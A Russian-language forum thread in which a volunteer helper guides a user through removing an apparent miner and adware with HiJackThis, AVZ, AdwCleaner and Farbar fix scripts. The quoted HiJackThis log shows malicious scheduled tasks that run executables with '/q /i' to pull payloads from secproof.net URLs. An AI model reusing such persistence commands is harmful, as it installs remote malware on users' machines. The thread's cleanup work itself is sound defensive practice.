Илья Болдырев Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 (изменено) Я уже не знаю, что делать. Пытаюсь забить в поисковике браузера какую нибудь программу, чтобы увидеть за что отвечает процесс svchost с ID 7500, но браузер тут же закрывается. Раньше с такими вирусами не сталкивался. Скорее всего, майнер. Прошу помочь. При запуске AutoLogger, появляется окошко и сразу закрывается. Никаких логов в папке нет. Изменено 4 июня, 2018 пользователем Илья Болдырев
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 Порядок оформления запроса о помощи. Сборщик логов не работает
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 Пробовали в безопасном режиме запустить автологгер?
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 (изменено) Пробовали в безопасном режиме запустить автологгер? Запустил каждую утилиту по отдельности и собрал их логи в один архив. Однако, когда пытаюсь открыть папку с AVZ, рабочий стол начинает мигать и вся папка со Сборщиком закрывается. И так каждый раз. Пробовали в безопасном режиме запустить автологгер? Также иногда открывается вкладка в браузере с рекламой казино... Пробовали в безопасном режиме запустить автологгер? Прошу прощения, надо было сразу в безопасном запускать. Вот архив с логами. CollectionLog-2018.06.04-06.43.zip Изменено 4 июня, 2018 пользователем Илья Болдырев
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 Удалите Iobit через установку программ в панели упраления. HiJackThis (из каталога autologger)профиксить O9-32 - Button: HKLM\..\{e6be8e97-9343-42bd-9cfd-9e2e74db25d8} - (no name) - (no file) O22 - Task: {59BF0B3A-D522-31FD-B4AF-52E1E6590D00} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://net2018.net/cl/?guid=o8r4g5otkyt3sbegs4g5e9vnpdh2ew2s&prid=1&pid=4_1009_0 O22 - Task: {C1A23778-BEE6-FD6A-6AC2-C3F497CF0758} - C:\WINDOWS\Yyye.exe /q /i http://secproof.net/6d37l5swnpoq.xyo O22 - Task: {CDD5D8F9-A723-8352-C439-739EEBB1594D} - C:\Users\ilyad\AppData\Roaming\EELC.exe /q /i http://secproof.net/kynlkbkzzble.ajb AVZ выполнить следующий скрипт.Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора. begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Users\ilyad\AppData\Roaming\EELC.exe',''); QuarantineFile('C:\WINDOWS\Yyye.exe',''); DeleteFile('C:\WINDOWS\Yyye.exe','64'); DeleteFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','64'); ExecuteFile('schtasks.exe', '/delete /TN "{C1A23778-BEE6-FD6A-6AC2-C3F497CF0758}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "{CDD5D8F9-A723-8352-C439-739EEBB1594D}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "{59BF0B3A-D522-31FD-B4AF-52E1E6590D00}" /F', 0, 15000, true); BC_ImportAll; ExecuteSysClean; BC_Activate; ExecuteRepair(9); ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. После перезагрузки: - Выполните в AVZ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.1. В заголовке письма напишите "Запрос на исследование вредоносного файла". 2. В письме напишите "Выполняется запрос хэлпера". 3. Прикрепите файл карантина и нажмите "Отправить" 4. Полученный ответ сообщите здесь (с указанием номера KLAN) - Подготовьте лог AdwCleaner и приложите его в теме.
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner". выполните в безопасном режиме
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 Выполнил все скрипты в AVZ. Однако, архив quarantine оказался пустой. Так должно быть? Выполнил сканирование через AdwCleaner. Вот логи. AdwCleanerS00.txt
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 возможно указанных файлов уже нет. Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 Отчет после удаления. AdwCleanerC01.txt
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
SQ Опубликовано 4 июня, 2018 Опубликовано 4 июня, 2018 Не используете больше одного антивируса в системе (Avast, Eset), удалите один из них. Иначе возможно проблемы с совместимостью. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx OPR Extension: (Tampermonkey) - C:\Users\ilyad\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2018-06-03] File: C:\WINDOWS\SysWOW64\Drivers\vduwodk5.sys File: C:\WINDOWS\system32\tcbres.wim File: C:\WINDOWS\system32\srms-apr.dat File: C:\WINDOWS\SysWOW64\srms-apr.dat 2018-06-04 07:40 - 2017-12-21 17:04 - 000000000 ____D C:\Users\ilyad\AppData\LocalLow\IObit 2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\Все пользователи\IObit 2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\ilyad\AppData\Roaming\IObit 2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\ProgramData\IObit 2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Program Files (x86)\IObit Folder: C:\Users\ilyad\3D Objects File: C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe 2018-04-12 03:34 - 2018-04-12 03:34 - 000178688 ____N (Microsoft Corporation) C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe File: C:\Users\ilyad\AppData\Local\WMI.ini AlternateDataStreams: C:\Users\Public\AppData:CSM [480] FirewallRules: [{1D21456D-6EBF-40BB-AF76-E0C82A419C40}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe FirewallRules: [{094B40ED-C0C4-49C2-A070-1BE203FEE6E8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe FirewallRules: [{5E53A729-41A2-49A0-BA8E-4FED1E3EE49F}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe FirewallRules: [{3647FA04-A65E-421C-B5A0-2DE9B8D359E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe FirewallRules: [{3ACDFBAC-E5DD-4008-A882-35BB847799ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe FirewallRules: [{87EA0775-1AF5-4E16-B3F7-7D41DED2F8A7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe Reboot: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен.
Илья Болдырев Опубликовано 4 июня, 2018 Автор Опубликовано 4 июня, 2018 Лог-файл Пользуюсь на данный момент только одним антивирусом (Avast), возможно, остались какие то файлы от ESET, так как раньше пользовался им. Fixlog.txt
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти